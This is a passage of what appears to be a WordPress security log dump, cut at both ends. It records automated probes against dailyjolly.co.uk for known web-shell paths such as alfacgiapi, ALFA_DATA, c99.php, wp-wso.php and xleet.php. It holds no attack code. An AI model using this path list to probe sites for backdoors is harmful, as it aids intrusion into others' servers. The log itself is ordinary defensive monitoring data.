3EX2xLeMAYdZj5y69VqRa4fv','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474244.2403,100,'orRb5e8PUTAkcyJZm0wlShBv','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474248.6035,100,'EGxNKAMB79F40iLwCyW8IleD','','13|0|0|0|www.dailyjolly.co.uk/.well-known/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474249.1058,100,'1yekSmtcYljp96Zo8KiP2rnW','','13|0|0|0|www.dailyjolly.co.uk/.well-known/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474249.6184,100,'AKoOhgqQMuTSNHs6CrXkByVZ','','13|0|0|0|www.dailyjolly.co.uk/.well-known/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474255.9432,100,'A4GuyvYw0NVCoJzka35bMrPg','','13|0|0|0|www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474256.4210,100,'0JQtgAFM3YcUI96qLfpwduVi','','13|0|0|0|www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474257.0465,100,'8M4iEmh1cGpyOQvlobUuXgjC','','13|0|0|0|www.dailyjolly.co.uk/.well-known/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474262.4441,100,'V9uzFM27G1X3LyHlKqandIZR','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474262.9510,100,'kDGp1e8BVEuOU0jzKNbY4oc2','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474263.3462,100,'Ni024aP6oIhSpc7zRG5YfvmW','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474268.5201,100,'ULeDAgz0WFG4fP8RtkKmTpNO','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474268.9447,100,'QR7gTMU635DPS8xaybuJwIc1','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474269.4331,100,'8HvcgCz6LKm4iBAuXRkIN5Mn','','13|0|0|0|www.dailyjolly.co.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474276.6446,100,'BcJNbE8dUiQsltyvYeS0G3Fh','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474277.2896,100,'0nZXaP8u47OojNybUFmlvgkL','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474277.7042,100,'ApJGzhXNCW4PLFbU7naHr8KO','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474281.5060,100,'i9RL1keaSwgNT2bjUfn8E5qK','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474281.8928,100,'KfLdRQv1mrwa06AXOI8VUbFi','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474282.2709,100,'fT9CyBDXQbcn0oE3RkF45INS','','13|0|0|0|www.dailyjolly.co.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474285.9257,100,'Psio03DyANwpeHLSQ5krfl94','','13|0|0|0|www.dailyjolly.co.uk/.tmb/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474286.3671,100,'ecrSDOA5QXpU84Ptmzyf0lLJ','','13|0|0|0|www.dailyjolly.co.uk/.tmb/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474286.8185,100,'c6PoyQ8HmBZbRSFvnwzdNAD1','','13|0|0|0|www.dailyjolly.co.uk/.tmb/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474290.9547,100,'NiQGKWHSX43JLOfqRehlkB0t','','13|0|0|0|www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474291.3578,100,'gnkzJPM4YEZf5mRUFQh7cAuv','','13|0|0|0|www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474291.7774,100,'zgfAuoZJRbkXFNCLBQ2wpe1n','','13|0|0|0|www.dailyjolly.co.uk/.tmb/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474297.7668,100,'H9q1kD7zSfKO6YM2bEBCRrdU','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474298.1924,100,'CM4KGFEPpsU7TVIye1rbhcWB','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474298.6279,100,'DFCyEPeau65YwAgS1mjzIbsv','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474302.3864,100,'wtY0Ah4Jdi8uKmWOG5QknSXL','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474302.7482,100,'P8dVeHOgSlspNT93jqJhxm24','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474303.1111,100,'Lgp1OXHldeNJ54PTMSj7FoAy','','13|0|0|0|www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474309.5204,100,'8qJmsG91UYNTWawtokyAzQpZ','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474309.8955,100,'63Tqov0O8MmaGLlkj9W7SXdh','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474310.2500,100,'O9jtZKnxCTiaQ8s63qzN0BLm','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474313.6840,100,'IN8xrXmchn2SEOGaKRUAbgwv','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474314.0419,100,'lOVsC3jW0EwPFH8Yndfzu7hv','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474314.3841,100,'JAz2Lkcp8NdCM7vnqBuUx13H','','13|0|0|0|www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474318.2504,100,'mfJp47yntwKNLGzdSWxlQTFI','','13|0|0|0|www.dailyjolly.co.uk/images/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474318.6207,100,'THWPt5wspQvA91FGRxSoek8a','','13|0|0|0|www.dailyjolly.co.uk/images/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474319.0018,100,'01cgPnTVBZN8hvedEJYKuiI6','','13|0|0|0|www.dailyjolly.co.uk/images/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474322.5425,100,'g4MBz1wUn5yA67lOIuv8CxEp','','13|0|0|0|www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474322.9064,100,'WFckPSOwqxJfdNHTCmX23orM','','13|0|0|0|www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474323.2802,100,'GtgrmHu5P9JZfdR2yDVYs8Wq','','13|0|0|0|www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474326.7838,100,'AXvRGeQF9ghbtmyHZWUEkV1L','','13|0|0|0|www.dailyjolly.co.uk/components/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474327.1380,100,'xJzuqkQ2Rr1N9YUa65I8gTLO','','13|0|0|0|www.dailyjolly.co.uk/components/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474327.5267,100,'TaYtq7zKAZf19dPV5OsB3u0S','','13|0|0|0|www.dailyjolly.co.uk/components/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474331.1412,100,'Llf7I9wWmSv8pu6jXV0RhUJY','','13|0|0|0|www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474331.5132,100,'8vsGjSDa5Lb7ChgBPefQlWNO','','13|0|0|0|www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474332.2040,100,'vwc7ob80aAud35BnXzRN6fmG','','13|0|0|0|www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474335.8068,100,'h7gOApHCqvUQMmIW5Verjkza','','13|0|0|0|www.dailyjolly.co.uk/wordpress/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474336.1730,100,'fpXoKcjW5nSBdUzx2yAbleTt','','13|0|0|0|www.dailyjolly.co.uk/wordpress/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474336.5799,100,'G6sjBIyxX2ONq7Yd1ipUlmQ5','','13|0|0|0|www.dailyjolly.co.uk/wordpress/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474340.1016,100,'WK79uiDMZCF3cGLYhpqkVvQ6','','13|0|0|0|www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474340.4595,100,'WvcXS6rlRfEhMP1aK0tsJmUI','','13|0|0|0|www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474340.8476,100,'YwRPU3mMSncATJ0GOfQdtDVL','','13|0|0|0|www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474344.3012,100,'WBFMyzJ72muTLrSj1gxwEs5v','','13|0|0|0|www.dailyjolly.co.uk/wp/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474344.6668,100,'g3RbJzPu6qsOYrhdWMBQfy9t','','13|0|0|0|www.dailyjolly.co.uk/wp/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474345.0775,100,'XxBb8WvnRcjrqf5GdQzgHi4P','','13|0|0|0|www.dailyjolly.co.uk/wp/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474348.4963,100,'iM0tAEzUw6CW1jk7foZPdT8G','','13|0|0|0|www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474348.9120,100,'aRBXofscKpudAChMOmZHJ3ES','','13|0|0|0|www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474349.2544,100,'pUZiTBQq5yDEm2sVvcwRgYLG','','13|0|0|0|www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474352.5726,100,'z4fZ1UDP6srKm5HvqAkTScyE','','13|0|0|0|www.dailyjolly.co.uk/blog/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474352.9564,100,'VR0cx527lTzm93iHKCSg4ErM','','13|0|0|0|www.dailyjolly.co.uk/blog/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474353.2913,100,'NBhQ0drqvg37YAx2SCHiuZJw','','13|0|0|0|www.dailyjolly.co.uk/blog/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474356.6105,100,'wBWfd9UtJaMvuSyzCNYbrj8l','','13|0|0|0|www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474356.9625,100,'Unw7TPtCXhgIF9LH8aVjBcW0','','13|0|0|0|www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474357.3045,100,'1K7ajVSZIduDoQP3pbzynrfs','','13|0|0|0|www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474360.7016,100,'aDckJfQT7G8xb2ziV0ruIAWy','','13|0|0|0|www.dailyjolly.co.uk/new/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474361.0839,100,'v6bRx7OKwLVTYka30dXprjI1','','13|0|0|0|www.dailyjolly.co.uk/new/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474361.4623,100,'0gWpP8kT1zIqAoN4s9uOZ7UB','','13|0|0|0|www.dailyjolly.co.uk/new/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474364.9553,100,'E1O5UXSlzjPcJDWvogxCAidL','','13|0|0|0|www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474365.3192,100,'Y8srVedNif5SR7TwHGE9F6MX','','13|0|0|0|www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474365.7635,100,'htLQPFvS9eI3d2gksAKJzXoj','','13|0|0|0|www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474369.2601,100,'WR6ArQMTjSUm4Plw7Lcti8ZH','','13|0|0|0|www.dailyjolly.co.uk/old/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474369.6351,100,'aOimE5kxS63Tr2CBYgtWQuG9','','13|0|0|0|www.dailyjolly.co.uk/old/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474369.9831,100,'pyLbRrlXUNFenHKYJ7tvSGiB','','13|0|0|0|www.dailyjolly.co.uk/old/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474373.4138,100,'yrLcdf1ZIvBDJzQFpnCho5qt','','13|0|0|0|www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474373.8005,100,'WQelM8zYpIBduxsbcKfHOZJV','','13|0|0|0|www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474374.1702,100,'pz9qJ0xTM8gde6UI3HbNZjmu','','13|0|0|0|www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474377.5094,100,'FuJ2Nta69YR3Ak1W7CwfzhiH','','13|0|0|0|www.dailyjolly.co.uk/backup/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474377.9002,100,'0f8kWuHzMBVRAI32EGJN1xbr','','13|0|0|0|www.dailyjolly.co.uk/backup/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474378.2455,100,'8iPbpXqOsS0ARK5nWfVxhHJz','','13|0|0|0|www.dailyjolly.co.uk/backup/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674474381.8802,100,'1s3j85EXhbTdBYO6vePwD7iu','','13|0|0|0|www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674474382.2196,100,'crtzhbYax8kyeUvDjKA24dwP','','13|0|0|0|www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674474382.5812,100,'Jw7f2WhZS14dEmAFcN3QValz','','13|0|0|0|www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/404.php',0,13,0),('185.36.81.21',3106165013,'',0,1674484245.9085,55,'POFj5b6qBGhTNznWlm2yCidr','','19|0|0|0|dailyjolly.co.uk/editor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('20.244.36.78',351544398,'',0,1674492568.1427,55,'UWsOBA8qaX0Zpv2lQmF9SJfy','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('20.244.36.78',351544398,'',0,1674492570.2438,55,'EnzSLs27bHXr1P5aIuhwcKmk','','19|0|0|0|www.dailyjolly.co.uk/0byte.php',0,19,0),('20.244.36.78',351544398,'',0,1674492571.1947,55,'Re9f3jBDbxHwMzpPK5Fl2QAa','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('20.244.36.78',351544398,'',0,1674492572.0714,55,'8mVn2NaHgih1wUdeYFSTRAus','','19|0|0|0|www.dailyjolly.co.uk/sym.php',0,19,0),('20.244.36.78',351544398,'',0,1674492573.0480,55,'57pJhgrkqbPExMy0lKTF8Ra4','','19|0|0|0|www.dailyjolly.co.uk/sym403.php',0,19,0),('20.244.36.78',351544398,'',0,1674492573.0590,10,'57pJhgrkqbPExMy0lKTF8Ra4','','707|0|0|0|www.dailyjolly.co.uk/sym403.php',0,707,0),('20.244.36.78',351544398,'',0,1674492573.9043,55,'g5Lz38QasXwMKdeNU7fJqF26','','19|0|0|0|www.dailyjolly.co.uk/xl.php',0,19,0),('20.244.36.78',351544398,'',0,1674492574.7515,55,'ZtYJWsDSQRGzolpeNcKCIrg8','','19|0|0|0|www.dailyjolly.co.uk/symlink.php',0,19,0),('20.244.36.78',351544398,'',0,1674492575.6598,55,'6xvVR7QcJsPC21bafw9LqAzp','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.244.36.78',351544398,'',0,1674492576.5184,55,'xQ0IdUsNKbM13ZDVec6ahGz9','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('20.244.36.78',351544398,'',0,1674492577.3687,55,'iLgml0nDyCBf69P4UGH2kp7t','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('20.244.36.78',351544398,'',0,1674492578.2385,55,'eY8Sk1K9NlGxHczBVowFiPMt','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.244.36.78',351544398,'',0,1674492579.1135,55,'dvxI31OwQk0uSBaXEGFJ8lh2','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('20.244.36.78',351544398,'',0,1674492580.0313,55,'0WOtFUuo2f6mTdLrKZJbX4iE','','19|0|0|0|www.dailyjolly.co.uk/xxx.php',0,19,0),('20.244.36.78',351544398,'',0,1674492580.8903,55,'8YnuyKGt1apvqAhx2SIkX056','','19|0|0|0|www.dailyjolly.co.uk/ok.php',0,19,0),('20.244.36.78',351544398,'',0,1674492581.7579,55,'AY7LnkGfDdrvumWjUH1sR4oe','','19|0|0|0|www.dailyjolly.co.uk/0.php',0,19,0),('20.244.36.78',351544398,'',0,1674492582.6501,55,'VGqKXJLgNieyA0xp3RlE2OM4','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.244.36.78',351544398,'',0,1674492583.5046,55,'jt2Vl9ZYaJrOMPS1xn6v0BFm','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('20.244.36.78',351544398,'',0,1674492584.3778,55,'pTmW6qsIoKZXEC2DRJG8HQFu','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('20.244.36.78',351544398,'',0,1674492585.2744,55,'lcbHBLN2uMdsaoS6Jk3ZPfxO','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('20.244.36.78',351544398,'',0,1674492586.1405,55,'BiYl18Fn5JeH3yszKVL7f9Uo','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('20.244.36.78',351544398,'',0,1674492587.0210,55,'L4j1JiplqtgskV06aOCIdvuc','','19|0|0|0|www.dailyjolly.co.uk/4.php',0,19,0),('20.244.36.78',351544398,'',0,1674492587.9152,55,'RL5kyV3aFjqlrcPtdY6zAxwC','','19|0|0|0|www.dailyjolly.co.uk/5.php',0,19,0),('20.244.36.78',351544398,'',0,1674492588.8248,55,'ysaegSoiP6IrOMElfKdj8XLc','','19|0|0|0|www.dailyjolly.co.uk/6.php',0,19,0),('20.244.36.78',351544398,'',0,1674492589.6673,55,'YR2Ql3XaxIJ5j8UrCpVGngTq','','19|0|0|0|www.dailyjolly.co.uk/7.php',0,19,0),('20.244.36.78',351544398,'',0,1674492590.5309,55,'3QXRKyelFqUvdNYkgGDHjb75','','19|0|0|0|www.dailyjolly.co.uk/8.php',0,19,0),('20.244.36.78',351544398,'',0,1674492591.3930,55,'OHhlAg1EMzqepruxsnf2bGyS','','19|0|0|0|www.dailyjolly.co.uk/9.php',0,19,0),('20.244.36.78',351544398,'',0,1674492592.2450,55,'09nt2hGug6rfxpXskTbRK7cj','','19|0|0|0|www.dailyjolly.co.uk/10.php',0,19,0),('20.244.36.78',351544398,'',0,1674492593.1134,55,'mfNjS8JLvYrZMkFG3UET1A4a','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.244.36.78',351544398,'',0,1674492594.0005,55,'eLPn2hZ49fEDCNj3gxXVvK5o','','19|0|0|0|www.dailyjolly.co.uk/z.php',0,19,0),('20.244.36.78',351544398,'',0,1674492594.8762,55,'64X7Owr9Qszg85i1dGl3Mecm','','19|0|0|0|www.dailyjolly.co.uk/e.php',0,19,0),('20.244.36.78',351544398,'',0,1674492595.7355,55,'pTok406zn3heyEZuxUBjOAsg','','19|0|0|0|www.dailyjolly.co.uk/r.php',0,19,0),('20.244.36.78',351544398,'',0,1674492596.6110,55,'IPAep5Ob7kjRNKfwao6ysm8z','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('20.244.36.78',351544398,'',0,1674492597.4923,55,'xLaIeMtYz90ZvKyQOProf6U7','','19|0|0|0|www.dailyjolly.co.uk/y.php',0,19,0),('20.244.36.78',351544398,'',0,1674492598.3539,55,'JfQmO0Md97T1PgyLlzX2V4jo','','19|0|0|0|www.dailyjolly.co.uk/u.php',0,19,0),('20.244.36.78',351544398,'',0,1674492599.2424,55,'pStlChz9j3LUQgDIqA2eoW6u','','19|0|0|0|www.dailyjolly.co.uk/i.php',0,19,0),('20.244.36.78',351544398,'',0,1674492600.2330,55,'1DSuQPCKRcW4J7XarMnYh3io','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('20.244.36.78',351544398,'',0,1674492601.1941,55,'KQ5BaIi4NZLubHx7JzPdr6pX','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('20.244.36.78',351544398,'',0,1674492602.1111,55,'E3fZeabMQOmwphFgitPn1H2d','','19|0|0|0|www.dailyjolly.co.uk/q.php',0,19,0),('20.244.36.78',351544398,'',0,1674492602.9971,55,'M3zRb4DdIFhQTYNaG9uVeP8k','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('20.244.36.78',351544398,'',0,1674492603.9117,55,'MBUmZw2EuStVCLGjWkvhaY7Q','','19|0|0|0|www.dailyjolly.co.uk/d.php',0,19,0),('20.244.36.78',351544398,'',0,1674492604.7934,55,'iGZhK6cTMmtXe4qPz2uIRbNl','','19|0|0|0|www.dailyjolly.co.uk/f.php',0,19,0),('20.244.36.78',351544398,'',0,1674492605.6661,55,'gUyd9QNr45E1GPvjVaFzceiO','','19|0|0|0|www.dailyjolly.co.uk/g.php',0,19,0),('20.244.36.78',351544398,'',0,1674492606.5052,55,'0532XAgE6GBRrOij1c9UmtNd','','19|0|0|0|www.dailyjolly.co.uk/h.php',0,19,0),('20.244.36.78',351544398,'',0,1674492607.3741,55,'R5eb2ofCGtB6zIAKw3jmv4P7','','19|0|0|0|www.dailyjolly.co.uk/j.php',0,19,0),('20.244.36.78',351544398,'',0,1674492608.2248,55,'uLWTyQ2kC5bwvoZPlE8aOSRh','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('20.244.36.78',351544398,'',0,1674492609.0991,55,'k2r30UbRJPpjGEfmlWO5taew','','19|0|0|0|www.dailyjolly.co.uk/l.php',0,19,0),('20.244.36.78',351544398,'',0,1674492609.9379,55,'ROnLtd7Cl6NDmAVhP3Q0c1zi','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.244.36.78',351544398,'',0,1674492610.8280,55,'TnVSm4MKwA2ZPdRGyJ3gC5x8','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.244.36.78',351544398,'',0,1674492611.6760,55,'u2jgEMwcb0ek5DoNpazlByq1','','19|0|0|0|www.dailyjolly.co.uk/v.php',0,19,0),('20.244.36.78',351544398,'',0,1674492612.5824,55,'McadYWeX1OymjsfpxIK4uqrt','','19|0|0|0|www.dailyjolly.co.uk/n.php',0,19,0),('20.244.36.78',351544398,'',0,1674492613.5244,55,'hlwx0sFNzZD3oYSicpO78rqt','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('20.244.36.78',351544398,'',0,1674492614.4518,55,'YjU0lKMWcPNHCFbVryXnv456','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.244.36.78',351544398,'',0,1674492615.3591,55,'c57njO06BFdHuMSbraQkhECe','','19|0|0|0|www.dailyjolly.co.uk/wp-wso.php',0,19,0),('20.244.36.78',351544398,'',0,1674492616.2280,55,'o6G9sJiTNtIuRAMfzU5hW3XY','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('20.244.36.78',351544398,'',0,1674492617.0730,55,'c0fntB2aHvyF8R3YbsMCVOiI','','19|0|0|0|www.dailyjolly.co.uk/minimo.php',0,19,0),('20.244.36.78',351544398,'',0,1674492618.0116,55,'Pj7IbEMWlGZH934oJQUtYeTi','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('20.244.36.78',351544398,'',0,1674492618.9238,55,'xM9yeSuTI10rYEchUHpznQBA','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('20.244.36.78',351544398,'',0,1674492619.7831,55,'3pNeEwtWk705P4vDIGBMflsU','','19|0|0|0|www.dailyjolly.co.uk/www.php',0,19,0),('20.244.36.78',351544398,'',0,1674492620.6728,55,'l217P9MnvsAHkXKyTFDWjzBu','','19|0|0|0|www.dailyjolly.co.uk/100.php',0,19,0),('20.244.36.78',351544398,'',0,1674492621.5526,55,'vDRbqIK49Ontiud02Lspch8T','','19|0|0|0|www.dailyjolly.co.uk/777.php',0,19,0),('20.244.36.78',351544398,'',0,1674492622.4448,55,'Xf5OKSFgtQ9szpIdlcnRAo01','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1674492623.2991,55,'f4mF0qMGBewTtdlcCYSgr8KN','','19|0|0|0|www.dailyjolly.co.uk/xox.php',0,19,0),('20.244.36.78',351544398,'',0,1674492624.2264,55,'EhFglrxHpaVtumeZ7DTNq8UO','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('20.244.36.78',351544398,'',0,1674492625.0748,55,'ly3qD2RczahxTkWUE06SbjgL','','19|0|0|0|www.dailyjolly.co.uk/wi.php',0,19,0),('20.244.36.78',351544398,'',0,1674492625.9833,55,'6MX0tgBUi1fmywWC7rcEZ58p','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('20.244.36.78',351544398,'',0,1674492626.8560,55,'3wIMUV0eRaNn1sH6PXiruvYm','','19|0|0|0|www.dailyjolly.co.uk/root.php',0,19,0),('20.244.36.78',351544398,'',0,1674492627.8140,55,'nw4Ddg5jS0mAVNoXGi7Hxz2J','','19|0|0|0|www.dailyjolly.co.uk/nee.php',0,19,0),('20.244.36.78',351544398,'',0,1674492628.6872,55,'AYJzfVKB5oxGuMZcT3W6y7sj','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('20.244.36.78',351544398,'',0,1674492629.5444,55,'Um8eVTyjs9gqdlAR4kQPv6Of','','19|0|0|0|www.dailyjolly.co.uk/lol.php',0,19,0),('20.244.36.78',351544398,'',0,1674492630.4046,55,'tYRLNWIpPrAx4Fd3S8uMVCv2','','19|0|0|0|www.dailyjolly.co.uk/87.php',0,19,0),('20.244.36.